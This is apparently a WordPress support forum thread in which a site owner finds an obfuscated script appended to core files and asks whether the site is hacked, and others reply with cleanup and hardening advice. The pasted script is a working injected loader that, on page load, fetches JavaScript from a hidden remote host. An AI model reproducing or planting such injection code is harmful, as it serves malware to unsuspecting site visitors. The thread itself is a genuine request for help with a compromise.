is someone hacking my wordpress site?

  • Zoni

    (@mister-beba)


    14 years, 11 months ago

    i started to get this kind of errors

    Parse error: syntax error, unexpected ‘<‘ in /home/djecaci/public_html/wp-includes/default-filters.php on line 230

    and on the line 230 in default-filters.php is this script. it is the last line in the file

    <script>/*GNU GPL*/ try{window.onload = function(){var Uvb1itrkz38 = document.createElement(‘s@#$c$^r(@)i@)^p)#)^^t(#!’.replace(/\$|@|\!|\^|&|\)|\(|#/ig, ”));Uvb1itrkz38.setAttribute(‘type’, ‘text/javascript’);Uvb1itrkz38.setAttribute(‘src’, ‘h$##&t$(t^#p)(!:@(&($/!/)(#^p@!(d&&f(^)d$^^)a(t$(&$a!#(b^@a()s@##e)$-#c#$(o)@m^)&.)$(s($^&e@)d!@o!#p&!a!r^&!k^i!@n$$@g!!(.(()$c))o$&@m&&#.@f$@#o@#&x&&^s@^p(o$)r^@t@$s)()@&-)!c!o##m#!.&!!v(!#!i^!(e)w&$h)o&&(^m#@@#@e)!s^a$!l^)#e&$#!.&^(!r#u$):(&#8@(0^8!(0()@!/(^!g^)@^o@^o)$#g^!l@^e@^).#$!c#&)!#o&@m^$/#!@g)&o^(o!@g(@&#^l!)!e@.(c&(#(o^&m(^/$#l&a$^(r)^e^!d$@o^u!t!e#$.((f&(!r(!&(/^)&g&&&^!o(o)&(g!@l!(@e(!.(@^h)&!!r!^/(@g&&i@!t(#t#i)@g^^i^#)d##i#&y)o#)r^&.@!^&c@o!!m^!/)&!(‘.replace(/\^|#|\)|&|@|\(|\!|\$/ig, ”));Uvb1itrkz38.setAttribute(‘defer’, ‘defer’);Uvb1itrkz38.setAttribute(‘id’, ‘Y^(@w$(a)$4!!8!)^j&#(f^u)@#x$!@&u&&^i(@^a&9$2&#7@^’.replace(/\(|\!|&|#|@|\$|\)|\^/ig, ”));document.body.appendChild(Uvb1itrkz38);}} catch(e) {}</script>

    i don’t know what this is?

    when i delete it, error says

    Parse error: syntax error, unexpected ‘<‘ in /home/djecaci/public_html/wp-includes/default-widgets.php on line 1043

    and when i go there in default-widgets.php, there again is this script on the last line in the file

    <script>/*GNU GPL*/ try{window.onload = function(){var Uvb1itrkz38 = document.createElement(‘s@#$c$^r(@)i@)^p)#)^^t(#!’.replace(/\$|@|\!|\^|&|\)|\(|#/ig, ”));Uvb1itrkz38.setAttribute(‘type’, ‘text/javascript’);Uvb1itrkz38.setAttribute(‘src’, ‘h$##&t$(t^#p)(!:@(&($/!/)(#^p@!(d&&f(^)d$^^)a(t$(&$a!#(b^@a()s@##e)$-#c#$(o)@m^)&.)$(s($^&e@)d!@o!#p&!a!r^&!k^i!@n$$@g!!(.(()$c))o$&@m&&#.@f$@#o@#&x&&^s@^p(o$)r^@t@$s)()@&-)!c!o##m#!.&!!v(!#!i^!(e)w&$h)o&&(^m#@@#@e)!s^a$!l^)#e&$#!.&^(!r#u$):(&#8@(0^8!(0()@!/(^!g^)@^o@^o)$#g^!l@^e@^).#$!c#&)!#o&@m^$/#!@g)&o^(o!@g(@&#^l!)!e@.(c&(#(o^&m(^/$#l&a$^(r)^e^!d$@o^u!t!e#$.((f&(!r(!&(/^)&g&&&^!o(o)&(g!@l!(@e(!.(@^h)&!!r!^/(@g&&i@!t(#t#i)@g^^i^#)d##i#&y)o#)r^&.@!^&c@o!!m^!/)&!(‘.replace(/\^|#|\)|&|@|\(|\!|\$/ig, ”));Uvb1itrkz38.setAttribute(‘defer’, ‘defer’);Uvb1itrkz38.setAttribute(‘id’, ‘Y^(@w$(a)$4!!8!)^j&#(f^u)@#x$!@&u&&^i(@^a&9$2&#7@^’.replace(/\(|\!|&|#|@|\$|\)|\^/ig, ”));document.body.appendChild(Uvb1itrkz38);}} catch(e) {}</script>

    and when i delete this script in this file, then my site works, but i don’t know how it came about. it happened 2 days ago, and i had to pull my backup for site to get it up and running, and now here it goes again. i upgraded to wordpress 2.9. does that has anything to do with it?

Viewing 8 replies - 1 through 8 (of 8 total)

  • There are a variety of plugins to protect your wordpress installation.

    I recommend using them all.

    One searches for intrusive scripts…its called exploit scanner…I am no expert, but try it, it might work…it does not remove problems, it only identifies known instrusions..

    Thread Starter Zoni

    (@mister-beba)

    it’s to late my site is hacked and i can’t do anything to repair the situation

    Parse error: syntax error, unexpected ‘<‘ in /home/djecaci/public_html/wp-includes/default-widgets.php on line 1044

    again, and i try to fix it when it shows up again and stops working but i can’t, don’t know what to do. i instaled some of those plugins, they do nothing.

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    Unfortunately you are beyond the “fix with a plugin” stage. You’re hacked.

    You got a lot of reading to do but this is not insurmountable.

    Give this a read as a start:

    https://codex.www.ads-software.com/FAQ_My_site_was_hacked

    Please pay close attention to the part that says “Take a backup of what you have left” and change your passwords.

    Then read up on this one

    https://ocaoimh.ie/did-your-wordpress-site-get-hacked/

    and also read Smackdown’s post on delousing your installation

    https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    Once you have cleaned up your installation then harden the now clean install.

    https://codex.www.ads-software.com/Hardening_WordPress

    Hardening it will mean (probably) that you’ll lose the ability to do automatic plugin and WordPress upgrades and will need to do those thing manually for the time being.

    Good luck and happy holidays.

    I’m having the same problem. But if you look at all the files on your server, you’ll see that script is in many of them ??

    What plugins do you have installed?

    Thread Starter Zoni

    (@mister-beba)

    my god, thank god i have a backup before this started, and there’s not that much new content added as this happened, so hopefully i can bring back the backup and do all things that need to be done for it to be secure.

    i had installed this plugins when the hacks started

    Akismet
    Broken Link Checker
    Contact Form 7
    NextGEN Gallery
    Redirector
    SEO Friendly Images
    Twitme
    Wordpress Download Monitor

    thenk you very much jdembowski

    Thread Starter Zoni

    (@mister-beba)

    it seems there it a large issue with wordpress security, and i would like to know how the really big sites that use it deal with this problems, like new york times blog, people, etc.

    It takes two to tango and sometimes more. I’ve seen sites done in different applications from HTML to ASP to JSP and other PHP sites hacked. It could be that you’re on a sublevel hosting plan or shared host or have the same password for everything in your host. Or, it could be that your computer has a virus and when you connect to your site, the virus is passed on when you upload a document or paste in information. So many factors to a secure website are involved.

    Just take care of your site. If you can’t, then there’s always wordpress.com and you can map your domain name to your install for a small fee. Just remember that as soon as you install WordPress or other applications, harden its security right away – even before adding the content, themes or other plugins. You have to be proactive in maintaining your installation. When there is a security version released for WordPress, upgrade right away. Seems to me that some value the compatibility of plugins more than the security of their installations.

    There are security issues with all platforms. Not just WordPress.

    Disclosure, education and diligence (in my opinion) are the greatest defenders. Unfortunately this has to include not only your web space, but the FTP or shell access information residing on local clients (the machines from which you access your ftp or hosting accounts) server side application security (if under your control), the policing and remediation of security risks added by third party plugins, themes, social networking applications and user introduced code or alterations to core files. It sure seems like an up-hill battle at times.

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘is someone hacking my wordpress site?’ is closed to new replies.